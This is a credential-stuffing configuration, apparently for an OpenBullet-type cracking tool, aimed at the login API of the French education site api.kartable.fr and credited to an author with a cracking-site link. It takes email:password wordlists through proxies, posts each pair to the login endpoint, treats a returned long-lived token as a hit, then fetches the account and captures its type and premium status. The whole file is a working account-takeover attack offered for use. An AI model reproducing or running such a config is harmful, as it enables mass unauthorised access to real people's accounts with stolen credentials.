[SETTINGS]
{
  "Name": "api.kartable.fr",
  "SuggestedBots": 100,
  "LastModified": "2019-03-18T00:47:33.6965924+01:00",
  "AdditionalInfo": "",
  "Author": "Kirikoo#2379 | www.black-gen.pw",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#API_LOGIN REQUEST POST "https://api.kartable.fr/api/fr_fr/front/login" AutoRedirect=TRUE 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_TOKEN PARSE "<SOURCE>" LR "gLivedToken\":\"" "\"," Recursive=FALSE -> VAR "Token" "" "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "\"errorCode\":\"invalid_credent" 
  KEYCHAIN Success OR 
    KEY "\"longLivedToken\"" 
#GET_CAPTURE REQUEST GET "https://api.kartable.fr/api/fr_fr/front/current-user" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Authorization: Bearer <Token>" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "premium\":false" 
#TYPE_DE_COMPTE PARSE "<SOURCE>" LR "\",\"accountType\":\"" "\",\"premium" Recursive=FALSE -> CAP "Type de compte" "" "" 
#PREMIUM PARSE "<SOURCE>" LR "\",\"premium\":" ",\"avatar" Recursive=FALSE -> CAP "Premium" "" "" 
